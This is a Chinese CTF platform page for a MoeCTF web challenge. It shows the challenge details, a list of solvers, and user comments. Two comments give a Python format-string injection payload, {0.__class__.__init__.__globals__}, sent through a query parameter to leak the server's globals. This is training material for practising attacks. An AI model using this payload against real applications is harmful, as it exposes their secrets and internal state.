地狱通讯WEB 未解决

分数: 0 金币: 0
题目作者: 未知
一  血: 2652040808
一血奖励: 0金币
解  决: 48
提  示:
描  述:
MoeCTF{}
评论
justsosoloveyou 8月前

SSTI和沙箱绕过。python的format函数的格式化字符串可以读取成员属性的特性,我们只需通过一个调用链来获取一个函数类并读取它的__globals__属性即可。payload:{0.__class__.__init__.__globals__}

回复 0

bhgctfon 8月前

构造payload ?f1ag=1&exp={0.__class__.__init__.__globals__}

回复 1

yUjdjasdjJ_ 10月前

这题有点抽象啊

回复 0

WriteUp

image
sean

1 金币

评分(0)

暂无评分

解题动态

wangjf 攻破了该题 3天前
coolsword2023 攻破了该题 3天前
lq61618 攻破了该题 18天前
小白小白 攻破了该题 24天前
3599348780 攻破了该题 1月前
15346899030 攻破了该题 1月前
CTF初学者 攻破了该题 1月前
adminwan 攻破了该题 2月前
一叶知秋 攻破了该题 2月前
mmzp 攻破了该题 2月前
gl 攻破了该题 2月前
xiaoxiao972521 攻破了该题 2月前
2362821788 攻破了该题 3月前
huangxian 攻破了该题 3月前
申申是糕手 攻破了该题 3月前
18092952956 攻破了该题 4月前
19743ksdfr 攻破了该题 4月前
沈奕 攻破了该题 4月前
crf11111 攻破了该题 4月前
黑客小贺 攻破了该题 4月前